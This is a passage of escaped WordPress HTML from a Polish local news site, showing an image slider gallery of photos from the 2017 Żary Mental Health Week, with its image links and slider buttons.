https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-17-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (16)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-16-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (15)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-15-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (14)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-14-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item14\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (13)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-13-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item15\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (12)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-12-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item16\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (11)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-11-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item17\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (10)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-10-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item18\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (9)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-9-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item19\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (8)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-8-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item20\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (7)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-7-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item21\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (6)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-768x1155.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-681x1024.jpg 681w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-696x1047.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-6-e1506522324596-1068x1606.jpg 1068w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item22\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (5)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-5-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item23\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (4)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-4-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item24\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (3)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-3-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item25\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (2)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-2-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item26\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1.jpg\" title=\"II \u017barski tydzie\u0144 Zdrowia Psychicznego 2017 (1)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-768x511.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-1024x681.jpg 1024w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/II-\u017barski-tydzie\u0144-Zdrowia-Psychicznego-2017-1-1068x710.jpg 1068w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-2\">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-button td-item1\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item2\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item3\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item4\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item5\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item6\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item7\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item8\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item9\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item10\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item11\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item12\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = \"td-button td-item13\">\r\n                        <div class = \"td-border\"><\/div>\r\n                    <\/div>\r\n                    <div class = 